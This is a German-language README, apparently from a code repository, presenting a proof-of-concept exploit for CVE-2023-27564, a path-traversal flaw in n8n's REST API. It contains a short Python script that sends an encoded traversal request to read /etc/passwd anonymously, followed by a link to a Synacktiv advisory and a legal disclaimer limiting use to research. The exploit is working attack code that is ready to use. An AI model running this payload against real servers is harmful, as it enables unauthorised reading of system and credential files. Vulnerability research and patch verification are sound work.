
Proof-of-Concept-Exploit für CVE-2023-27564, der anonymes Dateilesen in n8n durch Pfad-Traversal in der REST-API ermöglicht. Vorgesehen für Sicherheitsforschung und Schwachstellenbewertung.
Diese Schwachstelle ermöglicht anonymes Dateilesen in n8n.
import requests
url = "https://example.com/rest/data/filesystem:..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd:.svg"
response = requests.get(url)
print(response.status_code)
print(response.headers)
print(response.text)
https://www.synacktiv.com/sites/default/files/2023-05/Synacktiv-N8N-Multiple-Vulnerabilities_0.pdf
Der in diesem Repository bereitgestellte Proof of Concept (PoC) dient ausschließlich zu Bildungs- und Sicherheitsforschungszwecken. Die Informationen und der Code sind für Cybersicherheitsexperten und Forscher bestimmt, um Schwachstellen in Software und Systemen zu verstehen und sich dagegen zu schützen. Jegliche Nutzung dieses PoC, der zugehörigen Informationen oder des Codes zum Angriff auf Ziele ohne vorherige gegenseitige Zustimmung ist illegal und strengstens untersagt.
Durch die Nutzung dieses PoC stimmen Sie zu, dass Sie die potenziellen Auswirkungen der demonstrierten Schwachstelle verstehen und dass Sie es verantwortungsvoll und ethisch verwenden werden. Die Autoren dieses PoC lehnen jegliche Haftung für Missbrauch dieses Materials oder Schäden ab, die aus der Nutzung der bereitgestellten Informationen und des Codes entstehen könnten. Es liegt in der Verantwortung des Endbenutzers, alle geltenden lokalen, staatlichen, nationalen und internationalen Gesetze einzuhalten.
Die Autoren haben alle angemessenen Anstrengungen unternommen, um die Richtigkeit und Zuverlässigkeit der in diesem Repository bereitgestellten Informationen sicherzustellen. Die Informationen werden jedoch ohne jegliche Gewährleistung „wie besehen“ zur Verfügung gestellt. Die Autoren übernehmen keine Verantwortung oder Haftung für die Richtigkeit, den Inhalt, die Vollständigkeit, die Rechtmäßigkeit oder die Zuverlässigkeit der enthaltenen Informationen.